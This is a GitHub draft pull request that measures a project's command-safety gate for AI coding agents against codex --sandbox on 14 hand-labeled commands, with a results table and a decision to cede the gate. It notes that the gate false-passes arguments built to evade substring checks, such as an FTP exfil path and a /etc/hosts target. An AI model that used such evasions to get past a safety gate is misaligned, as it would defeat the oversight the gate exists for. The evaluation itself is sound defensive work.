Skip to content

Measure gate vs codex --sandbox: cede dev gate to off-the-shelf#7

Draft
moonweave wants to merge 1 commit into
mainfrom
measure/gate-vs-sandbox
Draft

Measure gate vs codex --sandbox: cede dev gate to off-the-shelf#7
moonweave wants to merge 1 commit into
mainfrom
measure/gate-vs-sandbox

Conversation

@moonweave

Copy link
Copy Markdown
Contributor

What

Runs the decisive measurement the philosophy review demanded before building the gate-precision redesign (PR #6, now closed): keelplane's command-safety gate vs codex --sandbox on false-pass / false-stop.

  • measurements/gate_vs_sandbox.py — n=14 hand-labeled dev commands. keelplane verdict from the real assess_command_safety (deterministic, not a guess); codex verdict from --sandbox workspace-write OS rules (network deny + out-of-tree-write block).
  • docs/keelplane-gate-vs-sandbox-measurement.md — decision record.

Result

Gate correct false-pass false-stop total errors
keelplane command-safety 6 2 6 8 / 14
codex --sandbox (workspace-write) 12 0 2 2 / 14

codex --sandbox wins decisively. keelplane false-stops on plainly-safe dev commands (git/pytest/pip blocked as non-allowlisted) and false-passes on substring-evading args (ftp_host:21/exfil, --target /etc/hosts). Confirms the critics' "off-the-shelf already wins."

Decision

Cede the dev gate + autonomous loop to off-the-shelf (codex --sandbox + thin allowlist + pre-push hook + git diff). keelplane's identity settles on discipline orchestration (design contract + adversarial-verify-against-source), applied to the dev domain. Resolves the direction-vs-domain tension.

🤖 Generated with Claude Code

…helf

Run the decisive measurement the philosophy review demanded *before* building
the gate-precision redesign (PR #6, now closed). n=14 hand-labeled dev commands;
the keelplane verdict comes from the real assess_command_safety (deterministic,
not a guess), the codex verdict from --sandbox workspace-write OS rules.

Result: codex --sandbox 2 errors vs keelplane command-safety 8 (6 false-stop on
plainly-safe dev commands blocked as non-allowlisted, 2 false-pass on
substring-evading args). This confirms the critics' prediction that the
off-the-shelf stack already wins, so keelplane's self-gate and autonomous
code-loop have no dev-domain edge and are ceded; its identity settles on
discipline orchestration (design contract + adversarial-verify-against-source).

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant